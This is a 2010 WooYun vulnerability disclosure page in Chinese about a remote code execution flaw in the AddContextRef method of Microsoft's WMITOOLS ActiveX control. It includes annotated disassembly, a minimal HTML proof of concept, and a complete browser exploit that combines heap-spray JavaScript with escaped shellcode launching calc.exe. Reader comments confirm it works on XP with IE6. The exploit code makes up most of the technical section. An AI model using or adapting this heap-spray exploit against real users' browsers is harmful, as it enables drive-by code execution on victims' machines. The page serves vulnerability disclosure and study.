当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(7) 关注此漏洞

缺陷编号: WooYun-2010-01006

漏洞标题: 微软WMITOOLS远程代码执行漏洞

相关厂商: Microsoft

漏洞作者: 牛奶坦克

提交时间: 2010-12-22 12:10

公开时间: 2010-12-22 15:37

漏洞类型: 远程代码执行

危害等级: 高

自评Rank: 20

漏洞状态: 未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org

Tags标签: 盲目信任用户数据 设计缺陷 heapspray 堆喷射 浏览器控件 浏览器漏洞利用

1人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2010-12-22: 积极联系厂商并且等待厂商认领中,细节不对外公开
2010-12-22: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

微软提供的WMITOOLS存在一个远程代码执行漏洞,攻击者可以直接控制一个调用地址,让程序直接走到我们在内存中已经布置好的shellcode上.

详细说明:

微软提供的WMITOOLS存在一个远程代码执行漏洞,攻击者可以直接控制一个调用地址,让程序直接走到我们在内存中已经布置好的shellcode上.



官方地址:

http://www.microsoft.com/downloads/en/details.aspx?FamilyID=6430f853-1120-48db-8cc5-f2abdc3ed314&displaylang=en



漏洞出在WBEMSingleView.ocx的AddContextRef方法上.



[id(0x00000018), helpstring("Increment Context Ref Count")]

long AddContextRef(long lCtxtHandle);



02D26BF9 837D 08 FF cmp dword ptr [ebp+8], -1

02D26BFD 74 06 je short 02D26C05

02D26BFF 837D 08 00 cmp dword ptr [ebp+8], 0

02D26C03 75 07 jnz short 02D26C0C

02D26C05 B8 05400080 mov eax, 80004005

02D26C0A EB 13 jmp short 02D26C1F

02D26C0C 8B45 08 mov eax, dword ptr [ebp+8] //可控的参数

02D26C0F 8945 FC mov dword ptr [ebp-4], eax

02D26C12 8B4D FC mov ecx, dword ptr [ebp-4]

02D26C15 8B11 mov edx, dword ptr [ecx] //继续传,传给了edx

02D26C17 8B45 FC mov eax, dword ptr [ebp-4]

02D26C1A 50 push eax

02D26C1B FF12 call dword ptr [edx] //控制了这个调用地址

漏洞证明:

POC:

<html>
<object classid="clsid:2745E5F5-D234-11D0-847A-00C04FD7BB08" id="target"></object>

<SCRIPT language="JavaScript">
target.AddContextRef(0x0c0c0c0c);
</script>
</html>













可执行shellcode的代码:

<html>
<object classid="clsid:2745E5F5-D234-11D0-847A-00C04FD7BB08" id="target"></object>

<SCRIPT language="JavaScript">
//run calc.exe
var shellcode = unescape("%uc92b%ue983%ud9de%ud9ee%u2474%u5bf4%u7381%u0c13%u452b%u83df%ufceb%uf4e2%uc3f0%udf01%u2b0c%u9ace%ua030%uda39%u2a74%u54aa%u3343%u80ce%u2a2c%u96ae%u1f87%udece%u1ae2%u4685%uafa0%uab85%uea0b%ud28f%ue90d%u2bae%u7f37%udb61%uce79%u80ce%u2a28%ub9ae%u2787%u540e%u3753%u3444%u3787%udece%ua2e7%ufb19%ue808%u1f74%ua068%uef05%ueb89%ud33d%u6b87%u5449%u377c%u54e8%u2364%ud6ae%uab87%udff5%u2b0c%ub7ce%u7430%u2974%u7d6c%u27cc%ueb8f%u8f3e%udb64%udbcf%u4353%u21dd%u2586%u2012%u48eb%ub324%u2b6f%udf45%u0000");

//先喷好堆
var bigblock = unescape("%u0C0C%u0C0C");
var headersize = 20;
var slackspace = headersize+shellcode.length;
while (bigblock.length<slackspace) bigblock+=bigblock;
fillblock = bigblock.substring(0, slackspace);
block = bigblock.substring(0, bigblock.length-slackspace);
while(block.length+slackspace<0x40000) block = block+block+fillblock;
memory = new Array();
for (x=0; x<350; x++) memory[x] = block +shellcode;

//让程序直接call过去
target.AddContextRef(0x0c0c0c0c);
</script>
</html>



修复方案:

有问题,找微软.

版权声明:转载请注明来源 牛奶坦克@乌云


漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝

漏洞Rank:20 (WooYun评价)


漏洞评价:

对本漏洞信息进行评价,以更好的反馈信息的价值,包括信息客观性,内容是否完整以及是否具备学习价值

漏洞评价(共6人评价):
登陆后才能进行评分
83.4%
16.7%
0%
0%
0%

评论

  1. 2010-12-22 15:58 | 0x0F ( 普通白帽子 | Rank:220 漏洞数:58 | 尖刀安全 (JDSec.Com).......................)
    1

    牛洞啊 是原创? 是就有意思了。! IE所有版本吧?

  2. 2010-12-22 19:21 | xsser ( 核心白帽子 | Rank:249 漏洞数:17 | 顺流而下,把梦做完|最近小忙,有问题可以...)
    1

    应该需要装那个软件的

  3. 2010-12-23 09:11 | 左右 ( 路人 | Rank:23 漏洞数:3 | 左右 ? 左. : 右.)
    1

    上香膜拜~~

  4. 2010-12-23 14:27 | 蚊虫 ( 实习白帽子 | Rank:36 漏洞数:12 | 我装逼这么牛可还是没妞喜欢我)
    2

    好给力的的积极拒绝....

  5. 2010-12-24 11:32 | xsser ( 核心白帽子 | Rank:249 漏洞数:17 | 顺流而下,把梦做完|最近小忙,有问题可以...)
    1

    积极拒绝是因为之前联系过 没有注册吧

  6. 2011-12-13 12:07 | Enjoy_Hacking ( 实习白帽子 | Rank:84 漏洞数:8 | 已到最后一行 雨脆弱的淋下 痛却不说话)
    2

    我靠、牛掰啊、、、膜拜大牛

  7. 2012-05-17 21:56 | tpu01yzx ( 实习白帽子 | Rank:53 漏洞数:5 | test)
    1

    什么年代的洞了,我的xp加ie6表示没有压力,可能是要装了那个wmitool才有用吧。装的人不多,给rank20多了。

登录后才能发表评论,请先 登录